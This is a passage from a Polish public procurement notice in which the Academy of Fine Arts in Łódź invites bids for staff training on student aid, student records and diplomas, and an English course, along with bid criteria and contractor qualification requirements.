Sądowa kontrola decyzji w sprawach studenckich<br/>8.	Rozwiązywanie zadań praktycznych – praca na podstawie przypadków zaistniałych w Akademii Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi z uwzględnieniem regulacji wewnątrzuczelnianych. <br/>Tryb szkolenia: szkolenie wewnętrzne, stacjonarne, zamknięte – na terenie Akademii Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi <br/>Okres szkolenia: szkolenie 2 - dniowe <br/>Ilość uczestników szkolenia: 10 osób (jedna grupa) <br/>Termin szkolenia: IX 2022 – VI 2023 r. <br/>Cena szkolenia nie obejmuje noclegu trenera.<br/>Szkolenie w formie wykładowo-warsztatowej, przy użyciu prezentacji multimedialnej, <br/>z interaktywnym udziałem uczestników szkolenia, polegającym na udziale w dyskusji <br/>z trenerem, analizie codziennych przypadków, wymianie doświadczeń wynikających z praktyki związanej z tematem szkolenia. Podczas szkolenia musi istnieć możliwość zadawania pytań prowadzącemu. W ramach szkolenia prowadzone będą także konsultacje indywidualne<br/>Trener musi posiadać doświadczenie w prowadzeniu szkoleń dla uczelni wyższych. <br/>W cenę szkolenia Wykonawca powinien wliczyć materiały szkoleniowe w formie wydruku lub materiałów w wersji cyfrowej, które zostaną przekazane uczestnikom szkolenia podczas zajęć.<br/>Wykonawca jest zobowiązany do przeprowadzenia testu przed szkoleniem sprawdzającego wiedzę słuchaczy oraz testu na zakończenie szkolenia, sprawdzającego progres wiedzy słuchaczy po ukończeniu szkolenia – wymóg z uwagi na fakt że szkolenie przeprowadzane jest w ramach projektu pn. „Zintegrowany program ASP w Łodzi 2” w ramach POWER Działanie 3.5. Kompleksowe programy szkół wyższych.<br/>Uczestnicy otrzymują Certyfikat Ukończenia Szkolenia w języku polskim, potwierdzający odbycie szkolenia. <br/>Testy, materiały szkoleniowe oraz certyfikaty powinny zostać oznaczone informacją <br/>o współfinansowaniu przez Unię Europejską z Europejskiego Funduszu Społecznego, które Wykonawca otrzyma od Zlecającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia - waga kryterium</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenia pomocy materialnej dla studentów oraz zasady wyliczania dochodu i stosowanie KPA przy przyznawaniu pomocy materialnej <br/>1.	Przepisy regulujące zagadnienia związane z udzielaniem pomocy materialnej.<br/>2.	Fundusz Stypendialny - zasady gromadzenia i wydatkowania środków.<br/>3.	Procedura przyznawania świadczeń z elementami postępowania administracyjnego.<br/>4.	Rodzaje świadczeń pomocy materialnej.<br/>5.	Świadczenia dla cudzoziemców.<br/>6.	Zasady ustalania dochodu rodziny studenta.<br/>7.	Dokumentowanie sytuacji materialnej (dochodowej) i rodzinnej studenta. <br/>8.	Zmiana sytuacji dochodowej – dochód utracony i dochód uzyskany.<br/>Tryb szkolenia: szkolenie zewnętrzne, stacjonarne, otwarte przy uczestnictwie szkolących się z innych uczelni wyższych<br/>Okres szkolenia: szkolenie 2 dniowe <br/>Ilość uczestników szkolenia: 2 osoby <br/>Termin szkolenia: IX 2022 – VI 2023 r. <br/><br/>Szkolenie w formie wykładowo-warsztatowej, przy użyciu prezentacji multimedialnej, <br/>z interaktywnym udziałem uczestników szkolenia, polegającym na udziale w dyskusji <br/>z trenerem, analizie codziennych przypadków, wymianie doświadczeń wynikających z praktyki związanej z tematem szkolenia. Podczas szkolenia musi istnieć możliwość zadawania pytań prowadzącemu. <br/>Trener musi posiadać doświadczenie w prowadzeniu szkoleń dla uczelni wyższych. <br/>W cenę szkolenia Wykonawca powinien wliczyć materiały szkoleniowe w formie wydruku lub materiałów w wersji cyfrowej, które zostaną przekazane uczestnikom szkolenia podczas zajęć.<br/>Wykonawca jest zobowiązany do przeprowadzenia testu przed szkoleniem sprawdzającego wiedzę słuchaczy oraz testu na zakończenie szkolenia, sprawdzającego progres wiedzy słuchaczy po ukończeniu szkolenia – wymóg z uwagi na fakt że szkolenie przeprowadzane jest w ramach projektu pn. „Zintegrowany program ASP w Łodzi 2” w ramach POWER Działanie 3.5. Kompleksowe programy szkół wyższych.<br/>Uczestnicy otrzymują Certyfikat Ukończenia Szkolenia w języku polskim, potwierdzający odbycie szkolenia. <br/>Testy, materiały szkoleniowe oraz certyfikaty powinny zostać oznaczone informacją <br/>o współfinansowaniu przez Unię Europejską z Europejskiego Funduszu Społecznego, które Wykonawca otrzyma od Zlecającego. <br/>W cenie szkolenia wykonawca zapewnia przerwy kawowe oraz lunch. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia - waga kryterium</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Administracyjna obsługa studentów – od kandydata do absolwenta w świetle najnowszych zmian, z uwzględnieniem regulacji dotyczących cudzoziemców<br/>Szkolenie powinno uwzględniać w szczególności:<br/>	wybrane przepisy ustawy Prawo o szkolnictwie wyższym i nauce<br/>	wybrane przepisy rozporządzenia Ministra Nauki i Szkolnictwa Wyższego w sprawie studiów<br/>	wybrane przepisy ustawy o dokumentach publicznych i rozporządzeń wykonawczych<br/>	rozporządzenie Ministra Nauki i Szkolnictwa Wyższego w sprawie wzoru zaświadczenia wydawanego cudzoziemców o przyjęciu lub o kontynuacji studiów<br/><br/>PROPONOWANY PROGRAM SZKOLENIA<br/>1.	Wiadomości wstępne<br/>•	podstawowe akty prawne<br/>•	sygnalizacja najnowszych zmian regulacji prawnych<br/>•	dokumentacja przebiegu studiów – zasady ogólne<br/>•	kilka słów o prowadzeniu dokumentacji przebiegu studiów w postaci elektronicznej<br/>•	dokumentacja przebiegu studiów a ochrona danych osobowych<br/><br/>2.	Teczka akt osobowych studenta – co powinna zawierać, jak należy ją prowadzić:<br/>•	dokumenty związane z przyjęciem na studia ze szczególnym uwzględnieniem dokumentów wymaganych od cudzoziemców<br/>•	dokumenty związane z rozpoczęciem studiów, w tym kilka słów o elektronicznej legitymacji studenckiej i m-legitymacji<br/>•	dokumenty dotyczące przebiegu studiów, w szczególności karty okresowych osiągnięć, decyzje dotyczące przebiegu studiów<br/>•	dokumenty związane z ukończeniem studiów, w szczególności praca dyplomowa, recenzja pracy dyplomowej, protokół egzaminu dyplomowego, dyplom ukończenia studiów i suplement do dyplomu <br/><br/>3.	Uczelniane wzory dyplomów ukończenia studiów wyższych<br/>•	niezbędne elementy dyplomu ukończenia studiów wyższych, w tym także w zakresie dyplomów wspólnych<br/>•	opracowanie wzoru dyplomu ukończenia studiów wyższych, w szczególności z uwzględnieniem wymogów określonych w ustawie o dokumentach publicznych oraz zabezpieczeń wskazanych w rozporządzeniu MSWiA<br/>•	obowiązki uczelni związane z dyplomem w świetle ustawy o dokumentach publicznych<br/>4.	Suplementy do dyplomu<br/>•	założenia suplementu do dyplomu<br/>•	struktura suplementu do dyplomu i jego treść<br/>•	wskazówki dla uczelni w zakresie wypełniania suplementów według starych i nowych przepisów<br/>5.	Zasady sporządzania i wydawania dyplomów i suplementów do dyplomów, ich odpisów i duplikatów<br/>•	wymogi formalne w zakresie:<br/>- zasad sporządzania dyplomów ukończenia studiów wyższych i suplementów<br/>- zasad wydawania dyplomów ukończenia studiów wyższych i suplementów<br/>•	zasady sporządzania i wydawania odpisów w językach obcych<br/>•	zasady sporządzania i wydawania duplikatów<br/>•	wymiana dokumentów o wykształceniu w razie zmiany danych osobowych<br/>6.	Opłaty za wydanie dokumentów dotyczących przebiegu studiów<br/>7.	Pozostała dokumentacja:<br/>•	album studenta<br/>•	rejestr wydanych legitymacji<br/>•	księga dyplomów<br/>8.	Czynności administracyjne związane z dokumentacją przebiegu studiów:<br/>•	przeniesienie do/z innej uczelni<br/>•	sprostowania<br/>•	wydawanie duplikatów<br/>•	wydawanie odpisów, wyciągów<br/>•	zmiana danych osobowych (w trakcie i po ukończeniu studiów) a dokumenty przebiegu studiów<br/>•	uwierzytelnianie dokumentów, w tym także przez NAWA<br/>•	sporządzanie i przekazywanie wzorów pieczęci urzędowych i podpisów osób upoważnionych do podpisywania dokumentów o wykształceniu, w szczególności dla potrzeb NAWA<br/><br/>Tryb szkolenia: szkolenie zewnętrzne, stacjonarne, zamknięte w wynajętej przez Akademię Sztuk Pięknych im. Władysława Strzemińskiego sali w miejscowości Gdańsk. <br/>Okres szkolenia: szkolenie 2 dniowe <br/>Ilość uczestników szkolenia: 10 osób w jednej grupie<br/>Termin szkolenia: IX 2022 – VI 2023 r. <br/>Cena szkolenia nie obejmuje noclegów trenera. <br/>Szkolenie w formie wykładowo-warsztatowej, przy użyciu prezentacji multimedialnej, <br/>z interaktywnym udziałem uczestników szkolenia, polegającym na udziale w dyskusji <br/>z trenerem, analizie codziennych przypadków, wymianie doświadczeń wynikających z praktyki związanej z tematem szkolenia. Podczas szkolenia musi istnieć możliwość zadawania pytań prowadzącemu oraz prowadzenie konsultacji indywidualnych. <br/>Trener musi posiadać doświadczenie w prowadzeniu szkoleń dla uczelni wyższych. <br/>W cenę szkolenia Wykonawca powinien wliczyć materiały szkoleniowe w formie wydruku lub materiałów w wersji cyfrowej, które zostaną przekazane uczestnikom szkolenia podczas zajęć.<br/>Wykonawca jest zobowiązany do przeprowadzenia testu przed szkoleniem sprawdzającego wiedzę słuchaczy oraz testu na zakończenie szkolenia, sprawdzającego progres wiedzy słuchaczy po ukończeniu szkolenia – wymóg z uwagi na fakt że szkolenie przeprowadzane jest w ramach projektu pn. „Zintegrowany program ASP w Łodzi 2” w ramach POWER Działanie 3.5. Kompleksowe programy szkół wyższych.<br/>Uczestnicy otrzymują Certyfikat Ukończenia Szkolenia w języku polskim, potwierdzający odbycie szkolenia. <br/>Testy, materiały szkoleniowe oraz certyfikaty powinny zostać oznaczone informacją <br/>o współfinansowaniu przez Unię Europejską z Europejskiego Funduszu Społecznego, które Wykonawca otrzyma od Zlecającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia - waga kryterium</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs języka angielskiego, poziom A1 dla dwóch osób<br/><br/>Zakres przedmiotu obejmuje wykonanie profesjonalnej usługi szkoleniowej polegającej <br/>na zorganizowaniu i przeprowadzeniu szkolenia z języka angielskiego, poziom A1 od podstaw, w grupie do 5 osób, <br/>Liczba osób do przeszkolenia – 2 osoby,<br/>Szkolenie ma trwać 2 semestry: 10 miesięcy od września 2022 do czerwca 2023. – 40 zajęć po 120 minut.<br/>Zajęcia mają się odbywać w godzinach rannych w siedzibie Zamawiającego – raz lub dwa razy w tygodniu po dwie godziny, szczegółowy harmonogram zajęć zostanie ustalony przed pierwszymi zajęciami. <br/> Uczestnik powinien otrzymać materiały szkoleniowe w formie drukowanej, które pomogą mu uporządkować i utrwalić dostarczaną wiedzę. Zakres tematyczny materiałów szkoleniowych musi być zgodny z zakresem realizowanego szkolenia. Zamawiający dopuszcza możliwość udostępnienia materiałów szkoleniowych na stronie internetowej do samodzielnego pobrania przez uczestnika szkolenia bądź przesłanie materiałów na adres e-mail uczestnika szkolenia.<br/> Po szkoleniu uczestnik musi otrzymać Certyfikat Ukończenia Szkolenia w języku polskim, potwierdzający jego odbycie wraz z określeniem zakresu i czasu trwania zajęć.<br/>Wykonawca zobowiązany jest do przeprowadzenia testu kompetencji ex ante i ex post u uczestnika kursu i przekazać Zamawiającemu wyniki przeprowadzonych testów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia - waga kryterium</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa<br/>1. Doświadczenie<br/>Część 1- Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał minimum 2 usługi szkolenia/kursu z zakresu obowiązujących aktów prawnych dotyczących uznawania zagranicznych dokumentów o wykształceniu wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>Część 2 – Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał minimum 2 usługi szkolenia/kursu z zakresu tworzenia regulaminów studiów wyższych wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>Część 3 – Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał minimum 2 usługi szkolenia z zakresu stosowania przepisów kodeksu postępowania administracyjnego w uczelniach, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>Część 4 – Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał minimum 2 szkolenia/kursy z zakresu z udzielania pomocy materialnej dla studentów, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>Część 5 -Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał minimum 2 usługi szkolenia z zakresu administracyjnej obsługi studentów, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>Część 6 – Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał minimum 2 Kursy języka angielskiego na poziomie A1, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/><br/>2. Dysponowanie osobami zdolnymi do realizacji zamówienia<br/> Część 1 - Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, która będzie uczestniczyć w realizacji zamówienia, tj. trenerem/wykładowcą, który przeprowadził co najmniej 10 szkoleń lub kursów dla uczelni wyższych w zakresie objętym opisem zagadnień szkolenia, w okresie ostatnich 4 lat przed upływem terminu składania ofert. Trener musi posiadać wykształcenie wyższe prawnicze, trener pracował/pracuje w uczelni wyższej przez okres min. 12 miesięcy w okresie ostatnich 4 lat prowadząc w szczególności sprawy objęte zakresem szkolenia. <br/><br/>Część 2 - Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, która będzie uczestniczyć w realizacji zamówienia, tj. trenerem/wykładowcą, który przeprowadził co najmniej 10 szkoleń lub kursów dla uczelni wyższych w zakresie objętym opisem zagadnień szkolenia, w okresie ostatnich 4 lat przed upływem terminu składania ofert. Trener musi posiadać wykształcenie wyższe prawnicze, trener pracował/pracuje w uczelni wyższej przez okres min. 12 miesięcy w okresie ostatnich 4 lat prowadząc w szczególności sprawy objęte zakresem szkolenia. <br/>Część 3 - Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, która będzie uczestniczyć w realizacji zamówienia, tj. trenerem/wykładowcą, który przeprowadził co najmniej 10 szkoleń lub kursów dla uczelni wyższych w zakresie objętym opisem zagadnień szkolenia, w okresie ostatnich 4 lat przed upływem terminu składania ofert. Trener musi posiadać wykształcenie wyższe prawnicze, trener pracował/pracuje w uczelni wyższej przez okres min. 12 miesięcy w okresie ostatnich 4 lat prowadząc w szczególności sprawy objęte zakresem szkolenia. <br/>Część 4 - Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, która będzie uczestniczyć w realizacji zamówienia, tj. trenerem/wykładowcą, który przeprowadził co najmniej 10 szkoleń lub kursów dla uczelni wyższych w zakresie objętym opisem zagadnień szkolenia, w okresie ostatnich 4 lat przed upływem terminu składania ofert. Trener musi posiadać wykształcenie wyższe prawnicze, trener pracował/pracuje w uczelni wyższej przez okres min. 12 miesięcy w okresie ostatnich 4 lat prowadząc w szczególności sprawy objęte zakresem szkolenia. <br/>Część 5- Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, która będzie uczestniczyć w realizacji zamówienia, tj. trenerem/wykładowcą, który przeprowadził co najmniej 10 szkoleń lub kursów dla uczelni wyższych w zakresie objętym opisem zagadnień szkolenia, w okresie ostatnich 4 lat przed upływem terminu składania ofert. Trener musi posiadać wykształcenie wyższe prawnicze, trener pracował/pracuje w uczelni wyższej przez okres min. 12 miesięcy w okresie ostatnich 4 lat prowadząc w szczególności sprawy objęte zakresem szkolenia. <br/>Część 6 - Wykonawca wykaże, że dysponuje lub będzie dysponował jedną osobą, która będzie uczestniczyć w realizacji zamówienia, tj. trenerem/wykładowcą, który przeprowadził co najmniej 5 szkoleń lub kursów z języka angielskiego w okresie ostatnich 4 lat przed upływem terminu składania ofert. Trener powinien ukończyć studia kierunkowe z zakresu języka angielskiego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dotyczy każdej części postępowania:<br/><br/>1. wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – załącznik nr 2 do SWZ.<br/>2.	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składana jest pod nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym 